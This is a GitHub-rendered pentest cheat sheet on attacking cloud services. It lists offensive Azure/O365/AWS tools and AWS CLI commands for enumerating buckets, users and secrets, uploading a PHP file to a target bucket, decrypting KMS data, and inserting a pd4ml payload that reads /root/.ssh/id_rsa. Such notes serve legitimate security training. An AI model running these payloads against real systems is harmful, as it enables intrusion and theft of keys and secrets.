Skip to content

Latest commit

 

History

History
147 lines (107 loc) · 5.22 KB

cloud.md

File metadata and controls

147 lines (107 loc) · 5.22 KB
Raw

Cloud

Table of Contents

Resources

Name Description URL
ADOKit Azure DevOps Services Attack Toolkit https://github.com/xforcered/ADOKit
AWS Security Checklist Made by Bour Abdelhadi https://awscheck.fyi
AzureHound Azure Data Exporter for BloodHound https://github.com/BloodHoundAD/AzureHound
BARK BloodHound Attack Research Kit https://github.com/BloodHoundAD/BARK
Bobber Bounces when a fish bites - Evilginx database monitoring with exfiltration automation https://github.com/Flangvik/Bobber
GraphRunner A Post-exploitation Toolset for Interacting with the Microsoft Graph API https://github.com/dafthack/GraphRunner
HacktricksCloud Welcome to the page where you will find each hacking trick/technique/whatever related to Infrastructure. https://github.com/carlospolop/hacktricks-cloud
lazys3 A Ruby script to bruteforce for AWS s3 buckets using different permutations. https://github.com/nahamsec/lazys3
o365-attack-toolkit A toolkit to attack Office365 https://github.com/mdsecactivebreach/o365-attack-toolkit
o365recon retrieve information via O365 and AzureAD with a valid cred https://github.com/nyxgeek/o365recon
Power Pwn An offensive and defensive security toolset for Microsoft 365 Power Platform https://github.com/mbrg/power-pwn
ROADtools A collection of Azure AD tools for offensive and defensive security purposes https://github.com/dirkjanm/ROADtools
S3cret Scanner Hunting For Secrets Uploaded To Public S3 Buckets https://github.com/Eilonh/s3crets_scanner
TeamFiltration TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts https://github.com/Flangvik/TeamFiltration

AWS

$ curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
$ sudo ./aws/install
$ aws configure
AWS Access Key ID [None]: AKIAIOSFODNN7EXAMPLE
AWS Secret Access Key [None]: wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
Default region name [None]: us-west-2
Default output format [None]: json

List Buckets

$ aws --endpoint-url=http://s3.<RHOST> s3api list-buckets

List Tables

$ aws dynamodb list-tables --endpoint-url http://s3.<RHOST>/

List Users

$ aws dynamodb scan --table-name users --endpoint-url http://s3.<RHOST>/

Upload Files

$ aws s3api put-object --endpoint-url http://s3.<RHOST>/ --bucket adserver --key <FILE>.php --body /PATH/TO/FILE/<FILE>.php

Alternativ Upload Technique

$ aws --endpoint-url=http://s3.<RHOST> s3 cp /PATH/TO/FILE/<FILE>.php s3://adserver

Create Table

$ aws dynamodb create-table --table-name alerts --attribute-definitions AttributeName=title,AttributeType=S --key-schema AttributeName=title,KeyType=HASH --provisioned-throughput ReadCapacityUnits=10,WriteCapacityUnits=5 --endpoint-url=http://s3.<RHOST>

Extract Data into Table

$ aws dynamodb put-item --table-name alerts --item '{"title": {"S": "Ransomware"}, "data": {"S": "<pd4ml:attachment description=\"attached.txt\" icon=\"PushPin\">file:///root/.ssh/id_rsa</pd4ml:attachment>"}}' --endpoint-url=http://s3.<RHOST>

List Keys

$ aws --endpoint-url http://127.0.0.1:4566 kms list-keys

List Secrets

$ aws --endpoint-url http://127.0.0.1:4566 secretsmanager list-secrets

Get Secret Values

$ aws --endpoint-url http://127.0.0.1:4566 secretsmanager get-secret-value --secret-id "<VALUE>" --version-stage AWSCURRENT

KMS Enable Key

$ aws --endpoint-url http://127.0.0.1:4566 kms enable-key --key-id f2358fef-e813-4c59-87c8-70e50f6d4f70

KMS Decrypt

$ aws --endpoint-url http://127.0.0.1:4566 kms decrypt --ciphertext-blob mXMs+8ZLEp9krGLLJT2YHLgHQP/uRJYSfX+YTqar7wabvOQ8PSuPwUFAmEJh86q3kaURmnRxr/smZvkU6Pp0KPV7ye2sP10hvPJDF2mkNcIEVif3RaMU08jZi7U/ghZyoXseM6EEcu9c1gYpDqZ74CMEh7AoasksLswCJJZYI0TfcvTlXx84XBfCWsK7cTyDb4SughAq9MY89Q6lt7gnw6IwG/tSHi9a1MY8eblCwCMNwRrFQ44x8p3hS2FLxZe2iKUrpiyUDmdThpFJPcM3uxiXU+cuyZJgxzQ2Wl0Gqaj0RpVD2w2wJGrQBnCnouahOD1SXT3DwrUMWXyeNMc52lWo3aB+mq/uhLxcTeGSImHJcfUYYQqXoIrOHcS7O1WFoaMvMtIAl+uRslGVSEwiU6sVe9nMCuyvrsbsQ0N46jjro5h1nFmTmZ0C1Xr97Go/pHmJxgG1lxnOepsglLrPMXc5F6lFH1aKxlzFVAxGKWNAzTlzGC+HnBXjugLpP8Shpb24HPdnt/fF/dda8qyaMcYZCOmLODums2+ROtrPJ4CTuaiSbOWJuheQ6U/v5AbeQSF93RF28iyiA905SCNRi3ejGDH65OWv6aw1VnTf8TaREPH5ZNLazTW5Jo8kvLqJaEtZISRNUEmsJHr79U1VjpovPzePTKeDTR0qosW/GJ8= --key-id 804125db-bdf1-465a-a058-07fc87c0fad0 --encryption-algorithm RSAES_OAEP_SHA_256 --output text --query Plaintext | base64 --decode > output

Abuse Access Control List (ACL) Misconfiguration

$ aws s3 ls s3://{<BUCKET>} --no-sign-request
$ aws s3 ls s3://<COMPANY>

GraphRunner

https://github.com/dafthack/GraphRunner

$ pwsh
PS> . ./GraphRunner.ps1
PS> List-GraphRunnerModules
PS> Get-GraphTokens
PS> Get-SecurityGroups
PS> Get-SecurityGroups -Tokens $tokens
PS> Get-UpdatableGroups -Tokens $tokens
PS> Get-DynamicGrous -Tokens $tokens
PS> Invoke-InviteGuest -Tokens $tokens
PS> Invoke-SecurityGroupCloner -Tokens $tokens

lazys3

https://github.com/nahamsec/lazys3

$ ruby lazys3.rb <DOMAIN>